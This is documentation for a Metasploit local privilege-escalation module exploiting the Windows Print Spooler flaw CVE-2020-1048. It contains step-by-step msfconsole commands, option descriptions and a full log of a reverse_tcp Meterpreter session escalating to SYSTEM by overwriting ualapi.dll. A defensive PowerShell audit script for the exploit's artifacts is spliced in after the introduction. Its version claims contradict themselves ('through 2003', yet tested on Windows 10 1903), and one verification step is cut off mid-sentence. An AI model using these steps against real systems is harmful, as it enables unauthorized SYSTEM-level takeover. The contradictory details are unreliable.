Vulnerable Application
Vulnerable versions for exploit: all unpatched Windows versions through version 2003.
Introduction
This exploit relies on a bug where you can create a virtual printer and print to trusted locations on the filesystem. If a user chooses the default overwrite, it may create a permanent backdoor.

Basically, this exploit creates a print job that writes to a trusted location. By selecting the location C:\windows\system32\ualapi.dll we abuse the spooler service twice. The spooler will print to this location when it restarts, then it will load the DLL into itself when it restarts a second time. The DLL will then be running as SYSTEM. When the printer is created, the target will show a pop-up saying a printer was created.

A larger issue here is that the Spooler service does not like to stop. Trying sc stop Spooler does not stop the spooler. Killing the pid with a trusted process will kill it, but it restarts automatically. Using the PendingFileRenameOperations registry key also does not appear to work.
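The write primitive above leaves two host-side artifacts a defender can look for: a printer port whose name is a local file path (the "virtual printer" pointing into a trusted directory), and a ualapi.dll in System32 that the spooler will load on its next restart. The following audit script is an added example, not part of the module or its documentation; it assumes the PrintManagement cmdlets (Get-PrinterPort, Get-Printer) are available and is run from an elevated PowerShell session.

```powershell
# Added example (not from the module): audit a host for the PrintDemon artifacts
# described above. Assumes the PrintManagement module is present (Windows 8 / 2012+).
$protectedRoots = @($env:windir, "$env:ProgramFiles", "${env:ProgramFiles(x86)}") |
    Where-Object { $_ }

# 1. A printer port named like a local file path is unusual; one that resolves under
#    %WINDIR% or Program Files is the exact primitive the exploit uses.
$filePorts = Get-PrinterPort | Where-Object { $_.Name -match '^[A-Za-z]:\\' }
if (-not $filePorts) {
    Write-Output "No file-path printer ports found"
}
foreach ($port in $filePorts) {
    $inProtected = $protectedRoots | Where-Object { $port.Name -like "$_\*" }
    $severity = if ($inProtected) { 'HIGH' } else { 'REVIEW' }
    # Which printer objects are bound to this port (the pop-up the page mentions
    # corresponds to one of these being created).
    $printers = (Get-Printer | Where-Object { $_.PortName -eq $port.Name } |
        Select-Object -ExpandProperty Name) -join ', '
    Write-Output ("[{0}] port '{1}' (monitor: {2}) bound to printers: {3}" -f
        $severity, $port.Name, $port.PortMonitor, $printers)
}

# 2. ualapi.dll is the DLL the spooler loads on restart. Assumption: a clean install
#    normally has no such file, so its presence, size, write time and signature
#    status are worth reporting.
$dll = Join-Path $env:windir 'System32\ualapi.dll'
if (Test-Path $dll) {
    $item = Get-Item $dll
    $sig  = Get-AuthenticodeSignature -FilePath $dll
    Write-Output ("[HIGH] {0} present: {1} bytes, written {2}, signature {3} ({4})" -f
        $dll, $item.Length, $item.LastWriteTime, $sig.Status, $sig.SignerCertificate.Subject)
} else {
    Write-Output "ualapi.dll not present in System32"
}
```

Because the spooler only performs the write when it restarts, a port flagged HIGH may exist before the DLL does, so both checks are needed.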
Verification Steps
Start msfconsole
Get a session on a Windows target that is not patched (and <= 2003)
use windows/local/cve_2020_1048_printerdemon
set session <session>
set payload <payload>
set lhost <lhost>
set lport <lport>
run
Verify target reboots automagically if
Reboot target again (yes, it has to reboot again)
Verify you get a session
Options
EXECUTE_DELAY The time between uploading and running the exploit. Default is 3 seconds, but high-latency networks may require more time.
EXPLOIT_NAME The name of the exploit when it is uploaded to the target (%RAND% by default).
EXPLOIT_DIR Directory to use for file upload and linking; this should not already exist (%RAND% by default).
OVERWRITE_DLL The remote location you would like to write to. Default is C:\windows\system32\ualapi.dll
PAYLOAD_NAME The filename to use for the payload binary (%RAND% by default). This is the name of the DLL payload when uploaded to the remote host.
RESTART_TARGET This will restart the target to force the overwrite. YOU WILL LOSE YOUR SESSION unless you have a method of persistence. The DLL will not be run until a second reboot.
WRITABLE_DIR The directory to use for the payload binary and uploaded payload (%RAND% by default).
Scenarios
Tested on Windows 10 x64 Release 1903
msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 2
[*] Started reverse TCP handler on 192.168.135.197:5555
msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200262 bytes) to 192.168.132.134
[*] Meterpreter session 2 opened (192.168.135.197:5555 -> 192.168.132.134:49675) at 2020-08-24 12:15:07 -0500
msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : DESKTOP-CL5L2IH
OS : Windows 10 (10.0 Build 18362).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: DESKTOP-CL5L2IH\msfuser
meterpreter > getsystem
[-] 2001: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 2...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/local/cve_2020_1048_printerdemon
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > show options
Module options (exploit/windows/local/cve_2020_1048_printerdemon):
Name Current Setting Required Description
---- --------------- -------- -----------
EXECUTE_DELAY 3 yes The number of seconds to delay between file upload and exploit launch
EXPLOIT_NAME no The filename to use for the exploit binary (%RAND% by default).
OVERWRITE_DLL no Filename to overwrite (%WINDIR%\system32\ualapi.dll by default).
PAYLOAD_NAME no The filename for the payload to be used on the target host (%RAND%.dll by default).
RESTART_TARGET true yes Restart the target after exploit (you will lose your session until a second reboot).
SESSION 1 yes The session to run this module on.
WRITABLE_DIR no Path to write binaries (%TEMP% by default).
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.135.197 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x64
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set verbose true
verbose => true
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set disablepayloadhandler false
disablepayloadhandler => false
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set wfsdelay 600
wfsdelay => 600
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > run
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set session 2
session => 2
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > run
[*] Started reverse TCP handler on 192.168.135.197:4444
[*] Checking Target
[*] Attempting to PrivEsc on DESKTOP-CL5L2IH via session ID: 2
[*] Build Number = 18362
[*] Uploading Payload
[*] Payload (5120 bytes) uploaded on DESKTOP-CL5L2IH to C:\Users\msfuser\AppData\Local\Temp\UCPNtlof
[!] This exploit requires manual cleanup of the payload C:\Users\msfuser\AppData\Local\Temp\UCPNtlof
[*] Sleeping for 3 seconds before launching exploit
[*] Uploading exploit to DESKTOP-CL5L2IH as C:\Users\msfuser\AppData\Local\Temp\JkrbEDShseh.exe
[*] Exploit uploaded on DESKTOP-CL5L2IH to C:\Users\msfuser\AppData\Local\Temp\JkrbEDShseh.exe
[*] Running Exploit
[*] Exploit output:
Printer created successfully
[*] Rebooting DESKTOP-CL5L2IH
[*] 192.168.132.134 - Meterpreter session 2 closed. Reason: Died
After the auto-reboot, reboot again. The first reboot performs the overwrite; the second loads the dll.
[*] Sending stage (200262 bytes) to 192.168.132.134
[*] Meterpreter session 3 opened (192.168.135.197:4444 -> 192.168.132.134:49669) at 2020-08-24 12:19:49 -0500
meterpreter > sysinfo
Computer : DESKTOP-CL5L2IH
OS : Windows 10 (10.0 Build 18362).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >